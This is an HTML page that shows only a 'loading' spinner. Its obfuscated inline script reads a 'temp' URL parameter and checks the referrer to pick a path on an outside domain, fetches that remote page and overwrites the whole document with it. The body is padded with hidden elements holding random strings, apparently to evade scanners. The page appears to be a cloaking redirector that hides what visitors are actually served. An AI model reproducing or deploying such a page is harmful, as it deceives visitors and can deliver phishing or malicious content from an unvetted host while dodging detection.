<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .E27Wrmc0 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .E27Wrmc0 .WsIkdYONF {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .E27Wrmc0 .content {
            line-height: 50px;
            text-align: center
        }

        .E27Wrmc0 .img {
            width: 100%
        }

        .E27Wrmc0 .dduOqPlnMI {
            text-align: center
        }

        .E27Wrmc0 .dduOqPlnMI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .E27Wrmc0 .dduOqPlnMI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .E27Wrmc0 .dduOqPlnMI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .E27Wrmc0 .dduOqPlnMI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .E27Wrmc0 .dduOqPlnMI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .E27Wrmc0 .dduOqPlnMI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .E27Wrmc0 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function noi8owyxZE2v(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var XrQ7rHD = noi8owyxZE2v('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ XrQ7rHD +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ XrQ7rHD +".html?a=share";
		}
		
        NBX34mdSs=url+"#"+new Date().getTime();
        NBX34mdSs && function() {
            $.get(NBX34mdSs, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>G8aa6ILjDJJX4QPXtc33OaoJP3m8QMyoOfg8tgawgQkPBoTJkQc6aNYc2hq3ujasnncJ7W</span>
<li style='display:none' >PcHnaD8awOUx6n22FKp3WQErIn2KMiadTMMukVFZA6rCxdl4yR42wREnm7J</li>
<ul style='display:none' >spoWvsAnJeQiwHd35r0SCYjKjrgSqumzG9Cap1HTjJ5dnoWjf3ZBRNMtDBhRTCAn9RchOnfQtp8Z</ul>
<b style='display:none' >TpzBr1kYQi0V1DAz9XKb4cC1Px3a6mtAyRwNCoOOEkcTM85RTrJTIR8BLjjZCk5Xxv8cKu7brOegXuBpflwvZh2SyCL4440Nl8ZY</b>
<li style='display:none' >PcHnaD8awOUx6n22FKp3WQErIn2KMiadTMMukVFZA6rCxdl4yR42wREnm7J</li>
<span style='display:none'>G8aa6ILjDJJX4QPXtc33OaoJP3m8QMyoOfg8tgawgQkPBoTJkQc6aNYc2hq3ujasnncJ7W</span>
<b style='display:none' >TpzBr1kYQi0V1DAz9XKb4cC1Px3a6mtAyRwNCoOOEkcTM85RTrJTIR8BLjjZCk5Xxv8cKu7brOegXuBpflwvZh2SyCL4440Nl8ZY</b>
<ul style='display:none' >spoWvsAnJeQiwHd35r0SCYjKjrgSqumzG9Cap1HTjJ5dnoWjf3ZBRNMtDBhRTCAn9RchOnfQtp8Z</ul>
<p  style='display:none'>MHHU5bzN8TwvWtay8u9GLXowbdEm1MHBOQmtBc</p>
<b style='display:none' >TpzBr1kYQi0V1DAz9XKb4cC1Px3a6mtAyRwNCoOOEkcTM85RTrJTIR8BLjjZCk5Xxv8cKu7brOegXuBpflwvZh2SyCL4440Nl8ZY</b><div class="E27Wrmc0">
    <div class="WsIkdYONF">
        <div class="dduOqPlnMI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>lHe1TInKlbjF9UZmjVjOYmm</p>
<span style='display:none'>vJcie1YpF6IE9fThKDKOw35</span>
<h1 style='display:none' >htedRgcvLIt2T1jshgacR38YwaIWS3loM4iu2Pqac0vrZniQzzXE0DcU4QR</h1>
<span style='display:none'>vJcie1YpF6IE9fThKDKOw35</span>
<ul style='display:none' >mJCsQ8wdcjQ0aSWDcjnuYPXAbPA0D438ft3i4xvmrjxY6Qs6lwMKzvUSmV5SYN2</ul>
<h1 style='display:none' >htedRgcvLIt2T1jshgacR38YwaIWS3loM4iu2Pqac0vrZniQzzXE0DcU4QR</h1>
<li style='display:none' >wpNJxTcQYOluWKSHIygXuv9dsoeMu1xwjUd4VFPgLbilW2nbz1nVRgtNQxW6RTlyhyHD05Iy</li>
<div style='display:none'>Pn78xnlznB3sBHcIgawZsFcAyHw</div></body>
</html>